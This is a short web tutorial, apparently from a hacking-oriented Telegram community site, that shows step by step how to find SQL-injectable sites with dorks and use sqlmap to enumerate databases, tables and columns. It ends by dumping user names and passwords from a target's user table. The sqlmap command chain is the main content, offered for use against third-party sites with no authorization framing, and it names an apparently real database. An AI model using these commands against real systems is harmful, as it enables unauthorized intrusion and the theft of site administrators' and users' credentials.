You can use the SQLMAP tool available on Backtrack or Kali, Windows. This is one of the skills that anyone working in the security field must know.
| Join the channel Telegram of the AnonyViet 👉 Link 👈 |
You can use some dorks to find a website with SQL errors,
Ex: we have a site like this http://www.xxxxxxxx.com/about.php?id=1
Now start SQL by typing (-h or –help) into the console
To view the database, use the following command:
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 --dbs
-u = url path
–dbs = List databases
According to the picture above, we can see ” unecuae_unec ” what is this, I don’t need to say more
Now we continue with the command:
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec --tables
-D = DBMS list data
–tables = list what you need to find out for yourself….
After finding some “periodic table”, we continue to use the command to show the goods
Code:
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user --columns
-T = DBMS command to list data
–columns = list what you need to find out for yourself….
At this point, you can see the admin’s underwear.)
#sqlmap -u http://www.xxxxxxxx.com/about.php?id=1 -D unecuae_unec -T user -C user_username,user_password --dump
